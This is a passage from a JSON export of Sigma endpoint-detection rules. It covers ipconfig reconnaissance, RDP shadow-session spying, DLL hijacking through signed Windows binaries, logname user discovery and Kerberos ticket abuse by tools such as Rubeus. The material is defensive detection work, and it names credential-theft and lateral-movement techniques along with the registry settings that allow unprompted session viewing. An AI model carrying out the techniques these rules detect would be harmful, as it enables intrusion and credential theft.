Files\\WindowsApps\\Microsoft.WindowsTerminal_*\\WindowsTerminal.exe'\n\n exclusion_cisco_webex:\n # Cisco Webex\n ParentImage|endswith: '\\webexmta.exe'\n GrandparentImage|endswith:\n - '\\atmgr.exe'\n - '\\ptoneclk.exe'\n\n exclusion_ocs_inventory:\n CommandLine|endswith: ' /displaydns'\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - 'OCS Inventory Agent'\n - 'Saas.ps1'\n GrandparentImage|endswith: '\\cmd.exe'\n GrandparentCommandLine|contains|all:\n - 'OCS Inventory Agent'\n - 'Saas.ps1'\n\n exclusion_ad_health_adfs_agent:\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoExit -Command &{write-host Executing Elevated PowerShell Command: Register-AzureADConnectHealthADFSAgent; import-module $env:ProgramW6432\\Azure` Ad` Connect` Health` Adfs` Agent\\PowerShell\\AdHealthAdfs; Register-AzureADConnectHealthADFSAgent}\n ParentCommandLine|contains: 'Register-AzureADConnectHealthADFSAgent'\n\n exclusion_commvault_diagnostics:\n # D:\\APP\\Commvault\\ContentStore\\Base\\sendLogFiles.exe\n - GrandparentImage|endswith:\n - '\\CvDiagnostics.exe'\n - '\\Commvault\\ContentStore\\Base\\sendLogFiles.exe'\n # C:\\Windows\\system32\\cmd.exe /c IPCONFIG /ALL >> \"E:\\APP\\Commvault\\iDataAgent\\JobResults\\Support_5536_7640_1635426317\\1635426317_1dd8_SystemConfig.txt\"\n # C:\\Windows\\system32\\cmd.exe /c IPCONFIG /ALL >> \"E:\\APP\\iDataAgent\\JobResults\\Support_6116_16112_1635426317\\1635426317_3ef0_SystemConfig.txt\"\n - ParentCommandLine|contains: '\\iDataAgent\\JobResults'\n\n exclusion_netsh:\n ParentImage: '?:\\Windows\\System32\\netsh.exe'\n ParentCommandLine|contains: 'wlan show wlanreport'\n\n exclusion_neovacom:\n ParentImage: '?:\\Neovacom\\eai\\ext\\\\*\\bin\\java.exe'\n GrandparentImage: '?:\\Neovacom\\eai\\ext\\bin\\wrapper.exe'\n\n # Cortana search bar\n exclusion_cortana:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s 
UserManager'\n\n exclusion_azure_networkwatcher:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ipconfig /all >> config\\\\*.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_oracle:\n GrandparentCommandLine|contains: 'oracle.sysman.db.discovery.plugin'\n GrandparentImage|endswith: '\\perl.exe'\n\n exclusion_anaconda:\n ParentImage|endswith:\n - '\\Anaconda\\python.exe'\n - '\\Anaconda\\pythonw.exe'\n - '\\Anaconda3\\python.exe'\n - '\\Anaconda3\\pythonw.exe'\n - '\\Anaconda\\envs\\\\*\\python.exe'\n - '\\Anaconda\\envs\\\\*\\pythonw.exe'\n - '\\Anaconda3\\envs\\\\*\\python.exe'\n - '\\Anaconda3\\envs\\\\*\\pythonw.exe'\n ParentCommandLine|contains: 'spyder'\n\n exclusion_anaconda_2:\n Ancestors|contains:\n - '\\Anaconda\\python.exe|'\n - '\\Anaconda\\pythonw.exe|'\n - '\\Anaconda3\\python.exe|'\n - '\\Anaconda3\\pythonw.exe|'\n - '\\Anaconda\\envs\\\\*\\python.exe|'\n - '\\Anaconda\\envs\\\\*\\pythonw.exe|'\n - '\\Anaconda3\\envs\\\\*\\python.exe|'\n - '\\Anaconda3\\envs\\\\*\\pythonw.exe|'\n\n exclusion_maxhub:\n GrandparentCommandLine: '?:\\Users\\\\*\\AppData\\Roaming\\Screenshare\\Bundle\\Maxhub.exe'\n\n exclusion_hospitalis:\n ProcessAncestors|startswith:\n - '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\wscript.exe|?:\\Windows\\System32\\svchost.exe|'\n - '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\wscript.exe|?:\\Windows\\System32\\taskeng.exe|'\n GrandparentCommandLine|contains|all:\n - '\\Hospitalis\\'\n - 'Transfert_FTP_Hospitalis.vbs'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dc40e7d9-a996-45bf-a2ae-f8caf1816852",
"rule_name": "Ipconfig Execution",
"rule_description": "Detects the execution of ipconfig.exe, a legitimate Windows utility used to gather network interface information.\nAdversaries may execute ipconfig.exe to collect network information for reconnaissance or data exfiltration purposes.\nIt is recommended to investigate the source and context of ipconfig.exe execution and correlate this alert with other discovery activities.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dc440cf6-da0d-4e1d-b6cd-f8bebbf66176",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077124Z",
"creation_date": "2026-03-23T11:45:34.077126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077130Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing",
"https://swarm.ptsecurity.com/remote-desktop-services-shadowing/",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1563_002_rdp_shadow_session_via_shadow.yml",
"content": "title: RDP Shadow Session via Shadow Utility\nid: dc440cf6-da0d-4e1d-b6cd-f8bebbf66176\ndescription: |\n Detects a command-line containing parameters for the Shadow RDP Client (shadow.exe), to log into an RDP Shadow Session.\n This action may or may not trigger an authorization pop-up, according to how the target machine is configured.\n This can be used by attackers to spy on or hijack a user's RDP session, as a means of acquiring credentials or moving laterally through the network.\n To investigate this action, you can check the following registry key on the target machine: \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\"\n 0 - No remote control allowed;\n 1 - Full Control with user's permission;\n 2 - Full Control without user's permission;\n 3 - View Session with user's permission;\n 4 - View Session without user's permission.\n This can also be allowed through group policy.\n This may be a legitimate action from a tech support team.\nreferences:\n - https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing\n - https://swarm.ptsecurity.com/remote-desktop-services-shadowing/\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Shadow\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'shadow.exe'\n CommandLine|contains: ' ?server'\n\n exclusion_systancia:\n GrandparentImage:\n - '?:\\Program Files\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\LaunchShadow64.exe'\n - '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\LaunchShadow64.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dc440cf6-da0d-4e1d-b6cd-f8bebbf66176",
"rule_name": "RDP Shadow Session via Shadow Utility",
"rule_description": "Detects a command-line containing parameters for the Shadow RDP Client (shadow.exe), to log into an RDP Shadow Session.\nThis action may or may not trigger an authorization pop-up, according to how the target machine is configured.\nThis can be used by attackers to spy on or hijack a user's RDP session, as a means of acquiring credentials or moving laterally through the network.\nTo investigate this action, you can check the following registry key on the target machine: \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\"\n0 - No remote control allowed;\n1 - Full Control with user's permission;\n2 - Full Control without user's permission;\n3 - View Session with user's permission;\n4 - View Session without user's permission.\nThis can also be allowed through group policy.\nThis may be a legitimate action from a tech support team.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2025-03-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dc52ce55-3228-42fd-9d4d-b5e511c28a9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602030Z",
"creation_date": "2026-03-23T11:45:34.602033Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602041Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_redirusr.yml",
"content": "title: DLL Hijacking via redirusr.exe\nid: dc52ce55-3228-42fd-9d4d-b5e511c28a9b\ndescription: |\n Detects potential Windows DLL Hijacking via redirusr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'redirusr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dc52ce55-3228-42fd-9d4d-b5e511c28a9b",
"rule_name": "DLL Hijacking via redirusr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via redirusr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dcacfe01-86ff-4919-826c-7eceb4b2233b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595037Z",
"creation_date": "2026-03-23T11:45:34.595041Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595049Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cofense.com/exploiting-unpatched-vulnerability-ave_maria-malware-not-full-grace/",
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dism.yml",
"content": "title: DLL Hijacking via DIS.exe\nid: dcacfe01-86ff-4919-826c-7eceb4b2233b\ndescription: |\n Detects potential Windows DLL Hijacking via DIS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://cofense.com/exploiting-unpatched-vulnerability-ave_maria-malware-not-full-grace/\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DISM.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dismcore.dll'\n - '\\version.dll'\n - '\\wimgapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dcacfe01-86ff-4919-826c-7eceb4b2233b",
"rule_name": "DLL Hijacking via DISM.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DISM.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dcb1a0c4-a1b3-4296-879e-423ee2d61e72",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081424Z",
"creation_date": "2026-03-23T11:45:34.081426Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081430Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applaunch.yml",
"content": "title: DLL Hijacking via applaunch.exe\nid: dcb1a0c4-a1b3-4296-879e-423ee2d61e72\ndescription: |\n Detects potential Windows DLL Hijacking via applaunch.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'applaunch.exe'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n ImageLoaded|endswith: '\\mscoree.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dcb1a0c4-a1b3-4296-879e-423ee2d61e72",
"rule_name": "DLL Hijacking via applaunch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via applaunch.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dcdd8674-3f5e-4d34-b37d-c24938f23b0a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617792Z",
"creation_date": "2026-03-23T11:45:34.617794Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617798Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_logname_unsigned_parents.yml",
"content": "title: Users Discovered via Logname by an Unsigned Process\nid: dcdd8674-3f5e-4d34-b37d-c24938f23b0a\ndescription: |\n Detects the execution of logname by an unsigned process.\n Adversaries may attempt to identify the primary user, currently logged-in user, set of users that commonly use a system, or whether a user is actively using the system.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en\n - https://attack.mitre.org/techniques/T1033/\ndate: 2024/09/26\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/logname'\n\n selection_unsigned:\n - ProcessParentSigned: 'false'\n - ProcessGrandparentSigned: 'false'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dcdd8674-3f5e-4d34-b37d-c24938f23b0a",
"rule_name": "Users Discovered via Logname by an Unsigned Process",
"rule_description": "Detects the execution of logname by an unsigned process.\nAdversaries may attempt to identify the primary user, currently logged-in user, set of users that commonly use a system, or whether a user is actively using the system.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dce8900d-6bdc-42c6-ab73-04731d439106",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295908Z",
"creation_date": "2026-03-23T11:45:35.295911Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295918Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://en.hackndo.com/kerberoasting/",
"https://github.com/GhostPack/Rubeus/",
"https://attack.mitre.org/techniques/T1558/"
],
"name": "t1558_kerberos_traffic_from_unusual_process.yml",
"content": "title: Kerberos Traffic from Unusual Process\nid: dce8900d-6bdc-42c6-ab73-04731d439106\ndescription: |\n Detects a network communication to the port 88 (Kerberos protocol) by an unusual process.\n Adversaries may use Kerberos exploitation tools such as Rubeus to communicate with Kerberos' KDC and obtain tickets on behalf of other users.\n It is recommended to verify the legitimacy of this network connection and check the detected process for any suspicious activity.\nreferences:\n - https://en.hackndo.com/kerberoasting/\n - https://github.com/GhostPack/Rubeus/\n - https://attack.mitre.org/techniques/T1558/\ndate: 2023/10/27\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558\n - attack.lateral_movement\n - attack.t1550\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n DestinationPort: '88'\n Initiated: 'true'\n ProcessImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n\n filter_legitimate_microsoft:\n ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n - '?:\\Windows\\SysWOW64\\vmnat.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v*\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v*\\powershell_ise.exe'\n - '?:\\Windows\\system32\\SnippingTool.exe'\n - '?:\\Windows\\System32\\mstsc.exe'\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\telnet.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_foglight:\n ProcessImage|endswith: '\\fog-*\\bin\\fglam.exe'\n\n exclusion_tomcat:\n - ProcessImage|endswith:\n - '\\tomcat\\bin\\tomcat?.exe'\n - 
'\\tomcat?\\bin\\tomcat?.exe'\n - ProcessSignature:\n - 'The Apache Software Foundation'\n - 'CodeSigning for The Apache Software Foundation'\n\n exclusion_hlwin:\n ProcessImage|endswith: '\\hlmwin\\exe\\h2000.exe'\n\n exclusion_jetbrain:\n - ProcessImage|endswith:\n - '\\bin\\idea64.exe'\n - '\\bin\\pycharm64.exe'\n - ProcessSignature: 'JetBrains s.r.o.'\n\n exclusion_java:\n - ProcessSigned: 'true'\n ProcessOriginalFileName:\n - 'java.exe'\n - 'javaw.exe'\n - ProcessImage|endswith: '\\sapjvm\\bin\\java.exe'\n\n exclusion_solarwind:\n ProcessSigned: 'true'\n ProcessSignature: 'SolarWinds WorldWide, LLC'\n\n exclusion_kinit:\n ProcessImage|endswith: '\\kinit.exe'\n\n exclusion_outlook_content:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n ProcessCommandLine|contains: '\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n\n exclusion_share:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n ProcessCommandLine|contains: ' \\\\\\\\'\n\n exclusion_paint:\n ProcessImage: '?:\\Windows\\System32\\mspaint.exe'\n\n exclusion_sap:\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_mobatek:\n ProcessSigned: 'true'\n ProcessSignature: 'Mobatek'\n\n exclusion_mremoteng:\n ProcessImage|endswith: '\\mRemoteNG\\mRemoteNG.exe'\n\n exclusion_ipscanner:\n ProcessImage|endswith:\n - '\\advanced_port_scanner.exe'\n - '\\advanced_ip_scanner.exe'\n\n exclusion_karakun:\n ProcessImage|endswith: 'javaws.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Karakun AG'\n\n exclusion_nettools:\n ProcessImage|endswith: '\\nettools.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Axence Inc.'\n\n exclusion_dbeaver:\n ProcessSigned: 'true'\n ProcessSignature: 'DBeaver Corp'\n\n exclusion_easypilot:\n ProcessImage|endswith: '\\easyPilot_Srv.exe'\n\n exclusion_mpv:\n ProcessImage: 